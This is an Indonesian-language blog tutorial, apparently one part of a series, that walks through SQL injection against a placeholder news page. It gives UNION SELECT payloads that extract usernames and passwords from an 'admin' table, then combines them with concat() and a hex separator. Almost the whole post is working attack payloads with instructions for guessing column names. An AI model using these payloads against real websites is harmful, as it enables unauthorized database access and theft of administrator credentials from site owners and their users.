Coba kita main tebak-tebakan: www.site.com/news.php?id=5 union all select 1,username,3 from admin/* Kita masukin ke nomor 2 karena Angka yang ada tadi 2, jadi kita ganti 2 menjadi nama column Kalo salah, akan muncul error, dan jika benar, akan muncul di layar usernamenya seperti admin atau superadmin
Kita akan cari passwordnya www.site.com/news.php?id=5 union all select 1,password,3 from admin/* Jika error, gantilah nama yang lain selain password, jika benar, kita akan melihat password yang masih hash atau sudah plain text (sesuai databasenya)
Lalu, kita harus menyelesaikan Query ini (kata mpu Marezzi biar bagus :-) ) Pakailah Concat = concat()
Contoh: www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note: Mpu Marezzi berkata, dia masukin 0x3a itu adalah hex value (jadi 0x3a adalah value dari column)
To be Continued Again (BANYAK BANGET!!!)
Langganan:
Postingan (Atom)
